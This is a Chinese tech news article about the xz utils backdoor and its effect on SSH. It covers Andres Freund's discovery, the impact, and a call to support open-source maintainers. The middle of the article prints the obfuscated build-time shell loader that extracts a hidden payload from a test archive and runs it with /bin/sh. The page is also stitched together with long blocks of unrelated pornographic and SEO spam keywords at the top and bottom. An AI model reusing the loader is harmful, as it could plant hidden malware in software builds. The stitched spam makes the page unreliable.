精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

安全專家對 SSH 漏洞感到恐慌

安全
在過去的幾個月里,每個人都在談論 SSH 中觸發的漏洞。通常對它的描述相當復雜。這只是某個隨機應用程序中的另一個漏洞嗎?如果是這樣,為什么網絡安全專家如此關注這一漏洞,而在線論壇上充斥著恐慌的安全專家?讓我們一探究竟!

SSH 中觸發的漏洞可以允許黑客接管服務器。安全專家感到恐慌。這次攻擊可能持續了兩年多,需要大量的資源和技術技能。

在過去的幾個月里,每個人都在談論 SSH 中觸發的漏洞。通常對它的描述相當復雜。這只是某個隨機應用程序中的另一個漏洞嗎?如果是這樣,為什么網絡安全專家如此關注這一漏洞,而在線論壇上充斥著恐慌的安全專家?讓我們一探究竟!

正如我們在 wiz.io 上讀到的,在 xz utils 的 5.6.0  5.6.1 版本中發現了一個后門,影響了 SSH。據我們了解,xz 是一個命令行壓縮工具,由 lzma 和 xz 組成,并影響了 SSH。

2024年3月29日星期五,Andres Freund向Openwall郵件列表發送了一封電子郵件。郵件列表對于精通技術的人來說就像Discord一樣,而Openwall是一個保護開源代碼的項目。

正是在那里,Andres 分享了他令人不安的發現。

服務器接管

他當時正在使用安全Shell協議(SSH)進行一些工作。對于幾乎每一個需要連接到服務器的人來說,SSH就像意大利面的叉子一樣。開發人員、DevOps、SecOps以及技術領域的每個人都在使用SSH安全地連接到服務器。即使服務器也使用SSH連接到其他服務器。

所以Andres當時正在做正常的技術工作,但有些事情不對勁,不僅僅是2024年橄欖油的價格。當他使用SSH登錄到一臺服務器時,服務器開始準備起飛。

風扇轉動得越來越快,通常安靜的服務器開始發出吸氣和打嗝的聲音。在這種時候,人們會檢查他們是否忘記關閉Windows時鐘應用程序,那個耗費CPU資源的野獸。

但是Andres使用的是Debian。所以他能夠立即排除這種可能性。此外,他注意到了更多的問題。Valgrind開始報告內存出現了一些問題。

這可能是什么原因呢?Windows Explorer突然開始挖掘比特幣了嗎?不可能是這樣的!

通常人們會責怪服務器,然后忘記整個問題,但有些事情困擾著Andres,他決定進行調查。

在深入研究之后,他注意到實際上是ssh導致了所有這些癥狀。這很奇怪,因為ssh不顯示廣告,你也不能在上面玩《古墓麗影:決定版》。

那么這個幾乎不消耗卡路里的應用程序到底是如何讓服務器如此劇烈運轉的呢?

兔子洞深處

兔子洞深處 Andres決定再深入一點。他啟動了診斷工具,越來越接近找出問題的具體原因。肯定是ssh,但ssh中的哪個具體部分呢?他注意到是xz。

深入下去,發現xz的一個特定部分導致了CPU和內存的狂歡派對——liblzma。

總結一下。Liblzma是xz命令行工具使用的壓縮庫。SSH使用了該命令行工具。這是計算機程序中正常的依賴鏈,在這種情況下,正是SSH的深層依賴liblzma導致了問題。

感謝開源,Andres能夠上網查看究竟發生了什么。他能夠看到Debian的xz utils的源代碼。

Andres發現了大量關于惡意代碼如何工作的信息。有兩個測試文件實際上是存檔文件。一個復雜的操作系統導致這些存檔文件在構建過程中被提取出來,并以包含后門的方式修改SSH構建,讓黑客可以登錄到服務器。

有趣的是,Andres發現這個后門還在開發中。隨著xz的后續版本發布,后門的作者試圖隱藏后門的存在,并實際修復了導致Valgrind錯誤列表像圣誕樹一樣閃爍的內存問題。

幸運的是,這個后門的作者相當低級,這讓Andres意識到有些不對勁。再過幾天或幾周,就沒人會注意到有什么問題了。

The source code of the backdoor:

####Hello####
#??Z?.hj?
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

特別是因為整個后門程序是以一種隱藏在某些倉庫中、只在特定環境下激活的方式構建的。Debian操作系統是決定使用該后門的一個重要因素。"

后門的影響

安全專家對這一發現感到震驚,每一天都帶來更多可怕的細節。通常當你有一臺服務器,并想要修復一個安全漏洞時,你可以使用SSH登錄并更新軟件。

但在這種情況下,SSH本身就存在一個后門。在這種情況下該怎么辦?

Wiz.io建議立即停止使用、升級受影響的服務器或者降級到不存在黑客可乘之機的版本。美國國家標準與技術研究院(NIST)對這個漏洞給予了10分的最高評級(滿分10分)。美國國家標準與技術研究院很少會對漏洞給予如此高的評級。

上一次發生這種情況是在 2024 年 2 月 21 日,針對 CVE-2024-1709:“ConnectWise ScreenConnect 23.9.7 及之前版本受身份驗證繞過漏洞的影響,該漏洞可能允許攻擊者直接訪問機密信息或關鍵系統。”

說 SecOps 目前正面臨困境還算輕描淡寫。現實情況是非常糟糕的。即使目前沒有關于針對已經設置的后門的任何主動攻擊信息,形勢依然嚴峻。

此外,代碼庫中那個令人不安的“Hello World”玩笑似乎暗示這只是類似攻擊的開始,實際上要將后門部署到目前這種程度,已經涉及到相當復雜的操作和技術知識。

這是支持核心維護者的信號

關于這次攻擊的所有細節都需要被發現,未來也將成為許多學術論文的主題。但得益于 Rob Mensching 的努力,我們已經能了解到許多內容。

一些專家認為這并非一次快速攻擊,而是一個經過精心策劃的計劃。兩年前,一些人開始持續向 xz 項目的維護者施壓,要求將維護權交給能夠繼續項目的新人員。公開的溝通信息表明,還存在一些隱晦的實質壓力。

最終,新維護者接手項目并開展工作,一切都很順利,直到后來被感染的檔案被加入項目。

我不確定那些向原 xz 維護者施壓的人是否參與其中。也許是,也許不是。不管怎樣,新維護者就是這樣上任的。同樣,我也不能確定賈譚是否真的就是行動背后的關鍵人物,因為他/她的系統也可能已經被入侵。這里存在很多不確定因素。

由于維護者的系統也可能被攻陷,這方面存在很多不確定性。

這里強調的一個重要問題是核心庫的維護者有多脆弱。我們所有人都依賴這些庫,但他們通常無法從這項工作中獲得收入,可能處于失業狀態,可能身陷危機,或面臨困境。

這些維護者沒有得到他們所需的所有資源,這是無法接受的。我們需要一種解決方案,讓整個社區(包括企業)全面地物質上支持這些人,并提供他們需要的建議,使他們能夠專注于自己的項目而不陷入任何陷阱。在這個案例中,如果原維護者能繼續項目工作,他本可以立即阻止漏洞的產生!

開源萬歲

得益于所有相關部分的開源性質,我們得以深入了解這次后門攻擊。如果無法查看源代碼,安德烈斯就無法如此迅速地向世界發出警報。對于封閉系統來說,從創建漏洞報告到公司復現、調查和修復可能需要數周甚至數月,導致后門在野外持續更長時間。

由于我們知道黑客引入后門的每一步操作,開源開發者和調查人員將能夠封堵這一路上開啟的每一扇門。這意味著即使如此復雜的攻擊可能發生,潛在的攻擊面也會被封鎖。

在這場戰斗中,開源就像一個自愈的生物,在每次病毒侵襲后變得愈加強大。當然,我們仍需要繼續改進。

責任編輯:姜華 來源: 大遷世界
相關推薦

2024-11-11 13:27:02

2021-04-14 09:50:48

零日漏洞漏洞網絡安全

2012-01-18 10:45:42

2009-07-17 16:38:40

2013-11-18 09:44:02

2009-04-24 11:03:40

2009-11-06 13:34:53

2014-04-10 18:48:16

OpenSSLHeartbleed漏

2021-09-10 10:42:40

蘋果漏洞安全研究人員

2012-02-24 15:14:23

ibmdw

2021-12-27 15:41:23

macOS漏洞惡意軟件

2014-03-25 14:54:48

2009-12-04 19:14:50

2022-12-15 07:48:33

2009-04-20 20:29:18

LinuxDellUbuntu

2022-06-16 15:56:57

安全專家微軟漏洞

2009-03-23 09:41:11

2025-04-18 00:10:00

AI人工智能安全漏洞

2013-06-27 17:30:37

2014-03-23 16:01:37

攜程漏洞信用卡支付安全
點贊
收藏

51CTO技術棧公眾號

欧美一区二区国产| 成人在线网址| 91天天综合| 欧美aa国产视频| 一本色道久久综合亚洲精品按摩| 成人黄色大片在线免费观看| 在线观看福利片| 少妇高潮一区二区三区99小说| 青青草国产免费一区二区下载| 欧美日韩激情视频8区| 99久久一区三区四区免费| 很污很黄的网站| 国产91在线精品| 亚洲精品精品亚洲| 亚洲字幕一区二区| 日韩va亚洲va欧美va清高| 精品三区视频| 国产精品丝袜91| 国产精品免费久久久久久| 中文字幕在线1| 欧美一区 二区 三区| av在线不卡观看免费观看| 欧美精品久久久久久久久久| 日本少妇xxxx软件| 黄色污污视频在线观看| 成人激情校园春色| 午夜精品视频在线| 国产呦小j女精品视频| 欧美男男tv网站在线播放| 99久久久精品| 亚洲一区二区日本| 中文在线免费看视频| 91久久电影| 日韩一区二区在线观看视频播放| 美女在线免费视频| 国产 日韩 欧美 精品| 在线亚洲观看| 在线成人中文字幕| 日韩 国产 一区| 美女日批视频在线观看| 99国产精品久| 国产精品久久久久久久久久小说 | 亚洲欧美日韩中文字幕在线观看| 免费人成在线观看播放视频| 国产酒店精品激情| 91精品国产网站| 91激情视频在线观看| 色狠狠一区二区三区| 亚洲精品五月天| 久久久久久一区| 国产三级理论片| 欧美三级小说| 国产亚洲精品一区二区| 无码人妻一区二区三区在线视频| 国产色婷婷在线| 亚洲一级电影视频| 欧美日韩在线高清| 99久久久久久久| 蜜桃视频一区| 欧美成年人网站| 欧美图片第一页| 偷拍亚洲色图| 日韩欧美一级二级| 无码无遮挡又大又爽又黄的视频| 国产在线观看免费麻豆| 91日韩在线专区| 91日本在线观看| 亚洲AV无码成人精品区东京热| 97精品视频| 亚洲欧美一区二区三区四区| 亚洲911精品成人18网站| 香蕉大人久久国产成人av| 在线观看视频一区二区| 日本手机在线视频| 精品国产丝袜高跟鞋| 亚洲欧美日韩国产一区二区三区| 91九色国产ts另类人妖| 黑人极品ⅴideos精品欧美棵| 亚洲一区二区三区四区五区黄 | 精品日韩欧美一区二区| 成人3d动漫一区二区三区| 欧美xxxbbb| 精品久久中文字幕| 国产精品三级一区二区| 91看片在线观看| 久久亚洲免费视频| 国产伦精品一区二区三| 国产三级三级在线观看| 成人午夜免费av| 91九色在线观看| 91成年人视频| 蜜桃免费网站一区二区三区| 91av视频在线免费观看| 亚洲综合成人av| 国产一区二区毛片| 91中文字幕在线| 无码精品人妻一区二区三区影院| 国产成人综合在线播放| 成人黄色激情网| 少妇高潮一区二区三区99小说| 欧美韩国日本一区| 日韩视频专区| aⅴ在线视频男人的天堂| 亚洲黄网站在线观看| 国产精品涩涩涩视频网站| 亚洲国产欧美国产第一区| 欧美午夜影院一区| 午夜免费福利在线| 国产人妖一区| 欧美日韩国产a| 一区二区三区四区毛片| 国产精品3区| 欧美一区二区三区啪啪| 午夜理伦三级做爰电影| 欧美激情 亚洲a∨综合| 国产精品三级网站| 婷婷五月综合激情| 亚洲精品ww久久久久久p站 | 国产专区综合网| 欧美污视频久久久| 爱搞国产精品| 色综合久久久久综合| 亚洲三级在线视频| 欧美大黑bbbbbbbbb在线| 国产91亚洲精品| 中文字幕乱码中文字幕| 99re8在线精品视频免费播放| 国产美女视频免费| 丁香花高清在线观看完整版| 678五月天丁香亚洲综合网| 天天爽夜夜爽视频| 久久中文亚洲字幕| 国产精品久久久久久网站 | 视频精品一区| www.亚洲免费视频| 青青草免费av| 久久精品青草| 欧美精品激情视频| www.xxx国产| 91丨九色丨国产丨porny| 国产 国语对白 露脸| 中文字幕成人| 亚洲国产成人在线视频| 新91视频在线观看| 国产亚洲一级| 国产在线观看精品| 日韩一级免费毛片| 中文字幕av一区二区三区高| 免费日韩视频在线观看| 白嫩亚洲一区二区三区| 色婷婷综合久久久久中文字幕1| 欧美成人精品欧美一| 狠狠色丁香婷婷综合| 国产尤物99| 日本福利在线| 亚洲高清在线视频| 免费看污污网站| 精品视频亚洲| 久久久久久久久久久国产| 在线免费观看日韩欧美| 久久视频精品在线观看| 九九热在线视频观看这里只有精品 | 国产av无码专区亚洲av毛网站| 国产自产视频一区二区三区| 国产女教师bbwbbwbbw| 加勒比中文字幕精品| 中文字幕亚洲欧美在线| 中文字幕一区二区三区手机版| 欧美a级理论片| 中文字幕日韩精品一区二区| 亚洲性色av| 欧美大黄免费观看| 国产精品18p| 国内外成人在线| 国产亚洲精品久久久久久久| 欧美美女黄色| 欧美成人三级视频网站| 黄色a在线观看| 色综合久久综合| 天海翼在线视频| 日韩国产精品久久久久久亚洲| 国产日韩二区| 无人区在线高清完整免费版 一区二| 精品国产成人在线影院| 黄色片子在线观看| 美女免费视频一区| 日韩一级免费看| 欧美人与拘性视交免费看| 久久久久久久网站| 黄色av免费在线观看| 精品久久久久久国产| 人人爽人人爽人人片| 国产成人在线影院| 草草草在线视频| 欧美日韩国产高清| 日韩欧美一区二区三区四区| 清纯唯美激情亚洲| 日本久久精品视频| 1024在线播放| 污软件在线观看| 小泽玛利亚一区二区免费| 欧美区高清在线| 中文字幕乱码在线| 毛片免费看不卡网站| 日韩欧美www| 久草视频一区二区| 一区二区三区欧美视频| 在线小视频你懂的| 成人精品国产一区二区4080| 尤物国产在线观看| 久久蜜桃av| 欧美精品亚洲精品| av日韩在线播放| 久久久久久午夜| 91伦理视频在线观看| 日韩电影在线观看中文字幕 | 日韩毛片精品高清免费| 99热这里只有精品在线播放| 亚洲网址在线| 国产偷久久久精品专区| 欧美videos粗暴| 日韩av免费看| 成人免费图片免费观看| 美乳少妇欧美精品| 日本高清在线观看wwwww色| 亚洲色图17p| 中文字幕 视频一区| 午夜精品视频一区| 日韩精品卡通动漫网站| 国产成人三级在线观看| 日本黄色福利视频| 欧美日韩亚洲国产精品| 在线一区日本视频| 欧美一区二区三| 欧美日韩免费精品| 亚洲成a人片77777在线播放| 国产精品影片在线观看| av在线播放观看| 深夜福利91大全| av男人的天堂在线| 在线国产精品播放| www亚洲人| 精品裸体舞一区二区三区| 国产精品久久婷婷| 午夜一区二区三区在线观看| 四虎精品免费视频| 亚洲天堂av老司机| theav精尽人亡av| 久久成人麻豆午夜电影| 日本www.色| 激情一区二区| 亚洲国产成人不卡| 久久porn| 激情一区二区三区| 99精品视频在线免费播放| 国产伊人精品在线| 99久热在线精品视频观看| 91免费看国产| 日本免费一区二区视频| 97夜夜澡人人双人人人喊| 99a精品视频在线观看| 国产精品一区二区欧美| 亚洲伊人春色| 亚洲精品电影在线一区| 亚洲最新色图| 欧美一区观看| 哺乳一区二区三区中文视频| 国产精品日韩高清| 美日韩中文字幕| 亚洲精品在线免费看| 仙踪林久久久久久久999| 天天做天天躁天天躁| 99视频一区| 一区二区在线免费看| 成人免费观看视频| 人人人妻人人澡人人爽欧美一区| 国产精品家庭影院| 偷拍女澡堂一区二区三区| 国产色爱av资源综合区| 国产伦精品一区二区三区妓女| 久久久综合精品| 91在线第一页| 成人av在线播放网址| 娇妻被老王脔到高潮失禁视频| 亚洲人成精品久久久久| 日本熟妇成熟毛茸茸| 日本高清视频一区二区| 精品在线播放视频| 亚洲自拍偷拍图区| 日韩成人毛片视频| 欧美丝袜一区二区| 99久在线精品99re8热| 91九色最新地址| 精品女同一区二区三区| 亚洲欧美国产一本综合首页| 国产一二区在线| 欧美一区二区三区……| 色综合桃花网| 91精品中文在线| 日韩中文av| 美女在线免费视频| 日韩电影在线一区二区| 性感美女一区二区三区| 国产最新精品精品你懂的| 国产精品成人无码专区| 99热这里都是精品| 国产精品久久久免费看| 欧美视频中文在线看| www.激情五月| 色一区av在线| 高潮一区二区| 国产伦精品一区二区| 欧美激情亚洲| 国产又大又黄又粗又爽| 97精品国产露脸对白| 超碰手机在线观看| 欧美亚洲动漫制服丝袜| 天天色综合久久| 欧美韩国理论所午夜片917电影| 青春草免费在线视频| 成人春色激情网| 国产影视一区| 亚洲一区在线免费| 亚洲成人二区| 欧美婷婷精品激情| 久久免费视频一区| 欧美bbbbbbbbbbbb精品| 在线欧美日韩国产| 黑人操亚洲女人| 欧美极品少妇xxxxⅹ裸体艺术| 91成人app| 中文精品一区二区三区| 免费观看一级特黄欧美大片| 亚洲熟妇一区二区三区| 天天操天天色综合| 人妻偷人精品一区二区三区| 久久97久久97精品免视看 | 欧美一区二区三| 成人午夜激情av| 国产日韩欧美一区二区三区乱码| 六月丁香激情综合| 精品视频色一区| 99在线小视频| 日韩大陆毛片av| 草草在线视频| 精品国产一区二区三区麻豆小说| 激情一区二区| 中文字幕精品久久久| 高跟丝袜一区二区三区| 亚洲欧洲国产综合| 日本欧美国产在线| 欧美日韩性在线观看| 午夜两性免费视频| 自拍偷拍亚洲激情| 性欧美18一19性猛交| 色综合老司机第九色激情| 大伊香蕉精品在线品播放| 天天久久人人| 亚洲经典视频在线观看| 美女网站免费观看视频| 国产日韩欧美制服另类| 136福利视频导航| 久久香蕉国产线看观看网| 亚洲涩涩在线| 欧美一区三区二区在线观看| 视频一区二区三区中文字幕| 免费黄色av网址| 精品国产999| 国产三级视频在线播放线观看| 欧美激情精品久久久久久蜜臀| av毛片精品| 男女视频一区二区三区| 18欧美乱大交hd1984| 国产91绿帽单男绿奴| 日韩av男人的天堂| 91久久高清国语自产拍| www.17c.com喷水少妇| 一本到高清视频免费精品| 亚洲s色大片| 国产精品久久波多野结衣| 免费亚洲婷婷| 天天插天天射天天干| 在线亚洲+欧美+日本专区| 麻豆传媒视频在线| 国产伦精品一区二区三区视频孕妇| 亚洲主播在线| 男女性高潮免费网站| 日韩精品在线第一页| 成年女人在线看片| 日韩欧美亚洲日产国产| 国产成人精品影视| 中文字幕日韩免费| 亚洲老头老太hd| 国产 日韩 欧美| 成人免费观看视频在线观看| 菠萝蜜视频在线观看一区| 中文字幕久久久久| 91国在线精品国内播放| 国产精品久久久久久麻豆一区软件| 91视频在线免费|